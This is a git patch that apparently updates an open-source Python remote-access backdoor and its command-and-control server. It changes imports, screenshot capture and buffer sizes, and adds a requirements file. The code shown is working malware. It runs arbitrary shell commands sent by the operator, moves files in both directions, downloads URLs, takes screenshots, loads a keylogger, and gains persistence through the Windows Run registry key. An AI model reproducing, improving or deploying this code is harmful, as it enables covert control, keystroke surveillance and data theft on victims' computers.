From 9dd0a57ddea6ee3de064e6156ef1b7b5a1ec4b68 Mon Sep 17 00:00:00 2001
From: Zepher Ashe <safesploit@users.noreply.github.com>
Date: Tue, 9 Aug 2022 10:18:25 +0100
Subject: [PATCH] Add files via upload

---
 backdoor/backdoor.py      | 61 +++++++++++++++++++++++++++++----------
 backdoor/keylogger.py     |  7 ++++-
 backdoor/requirements.txt |  9 ++++++
 c2.py                     | 11 +++++--
 4 files changed, 68 insertions(+), 20 deletions(-)
 create mode 100644 backdoor/requirements.txt

diff --git a/backdoor/backdoor.py b/backdoor/backdoor.py
index ad44b4d..db2a124 100644
--- a/backdoor/backdoor.py
+++ b/backdoor/backdoor.py
@@ -3,18 +3,27 @@
 import subprocess
 import time
 import os
-import pyautogui    #dependency # pip install pyautogui #mss is faster alternative
-import keylogger
 import threading
 import shutil
 import sys
-import requests
 from sys import platform
 
+# External dependencies
+from mss import mss
+import requests
+
+# Local dependencies
+import keylogger
+# from mss import mss # mss v6.1.0
+# import requests # v2.28.0
+
+
+
 def reliable_send(data):
     jsondata = json.dumps(data)
     s.send(jsondata.encode())
 
+
 def reliable_recv():
     data = ''
     while True:
@@ -24,6 +33,7 @@ def reliable_recv():
         except ValueError:
             continue
 
+
 def download_file(file_name):
     f = open(file_name, 'wb')
     s.settimeout(2)
@@ -37,32 +47,46 @@ def download_file(file_name):
     s.settimeout(None)
     f.close()
 
+
 def upload_file(file_name):
     f = open(file_name, 'rb')
     s.send(f.read())
 
+
 def download_url(url):
     get_response = requests.get(url)
     file_name = url.split('/')[-1]
     with open(file_name, 'wb') as out_file:
         out_file.write(get_response.content)
 
+
 def screenshot():
-    myScreenshot = pyautogui.screenshot()
-    myScreenshot.save('.screen.png')
+    if platform == "win32" or platform == "darwin":
+        with mss() as screen:
+            filename = screen.shot()
+            os.rename(filename, '.screen.png')
+    elif platform == "linux" or platform == "linux2":
+        with mss(display=":0.0") as screen:
+            filename = screen.shot()
+            os.rename(filename, '.screen.png')
+
+# TODO: screenshot other monitors
 
 def persist(reg_name, copy_name):
     file_location = os.environ['appdata'] + '\\' + copy_name
     try:
         if not os.path.exists(file_location):
             shutil.copyfile(sys.executable, file_location)
-            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
+            subprocess.call(
+                'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"',
+                shell=True)
             reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
         else:
             reliable_send('[+] Persistence Already Exists')
     except:
         reliable_send('[-] Error Creating Persistence With The Target Machine')
 
+
 def is_admin():
     global admin
     if platform == 'win32':
@@ -72,28 +96,29 @@ def is_admin():
             admin = '[!!] User Privileges!'
         else:
             admin = '[+] Administrator Privileges!'
-    elif platform == "linux" or platform == "linux2" or platform == "darwin": 
+    elif platform == "linux" or platform == "linux2" or platform == "darwin":
         pass
-        #TO BE DONE
+        # TO BE DONE
+
 
 def shell():
     while True:
         command = reliable_recv()
         if command == 'quit':
             break
-        elif command == 'background':   #BEGIN
+        elif command == 'background':  # BEGIN
             pass
-        elif command == 'help':         #ideally to be removed
+        elif command == 'help':  # ideally to be removed
             pass
         elif command == 'clear':
-            pass                        #END
+            pass  # END
         elif command[:3] == 'cd ':
             os.chdir(command[3:])
         elif command[:6] == 'upload':
             download_file(command[7:])
         elif command[:8] == 'download':
             upload_file(command[9:])
-        elif command[:3] == 'get': 
+        elif command[:3] == 'get':
             try:
                 download_url(command[4:])
                 reliable_send('[+] Downloaded File From Specified URL!')
@@ -119,7 +144,8 @@ def shell():
             reg_name, copy_name = command[12:].split(' ')
             persist(reg_name, copy_name)
         elif command[:7] == 'sendall':
-            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
+                             stdin=subprocess.PIPE)
         elif command[:5] == 'check':
             try:
                 is_admin()
@@ -133,11 +159,13 @@ def shell():
             except:
                 reliable_send('[-] Failed to start!')
         else:
-            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
+            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
+                                       stdin=subprocess.PIPE)
             result = execute.stdout.read() + execute.stderr.read()
             result = result.decode()
             reliable_send(result)
 
+
 def connection():
     while True:
         time.sleep(5)
@@ -150,6 +178,7 @@ def connection():
             break
         except:
             connection()
-            
+
+
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-connection()
\ No newline at end of file
+connection()
diff --git a/backdoor/keylogger.py b/backdoor/keylogger.py
index 8a02bc4..f1aac2f 100644
--- a/backdoor/keylogger.py
+++ b/backdoor/keylogger.py
@@ -1,10 +1,15 @@
 #Possibly requires Python3.7
 import os
-from pynput.keyboard import Listener #Dependency # pip install listener
 import time
 import threading
 from sys import platform
 
+# External dependencies
+from pynput.keyboard import Listener
+
+# Local dependencies
+# from pynput.keyboard import Listener #v1.7.6
+
 class Keylogger():
     keys = []
     count = 0
diff --git a/backdoor/requirements.txt b/backdoor/requirements.txt
new file mode 100644
index 0000000..f821913
--- /dev/null
+++ b/backdoor/requirements.txt
@@ -0,0 +1,9 @@
+# Generated using Pipreqs
+# https://pypi.org/project/pipreqs/
+
+# pip install pipreqs
+# pipreqs /path/to/project
+
+PyAutoGUI==0.9.53
+pynput==1.7.6
+requests==2.28.0
diff --git a/c2.py b/c2.py
index b6f83d2..b339a02 100644
--- a/c2.py
+++ b/c2.py
@@ -55,11 +55,15 @@ def screenshot(target, count):
         os.makedirs(directory)
     f = open(directory + '/screenshot_%d.png' % (count), 'wb')  # if target=Linux then #apt-get install scrot
     target.settimeout(3)
-    chunk = target.recv(1024)
+    try:
+        chunk = target.recv(10485760)  # 10MB
+    except:
+        pass
+
     while chunk:
         f.write(chunk)
         try:
-            chunk = target.recv(1024)
+            chunk = target.recv(10485760)
         except socket.timeout as e:
             break
     target.settimeout(None)
@@ -134,6 +138,7 @@ def target_communication(target, ip):
             download_file(target, command[9:])
         elif command[:10] == 'screenshot':
             screenshot(target, count)
+            count = count + 1
         elif command == 'help':
             server_help_manual()
         else:
@@ -243,4 +248,4 @@ def accept_connections():
 # TODO: encrypt connection
 # TODO: Implement a 'pulse' feature between server and backdoor (Keep alive)
 # This will ensure if server.py crashes the backdoor will after 60s will realise server is not listen on socket
-# and will attempt to run connection() function again.
\ No newline at end of file
+# and will attempt to run connection() function again.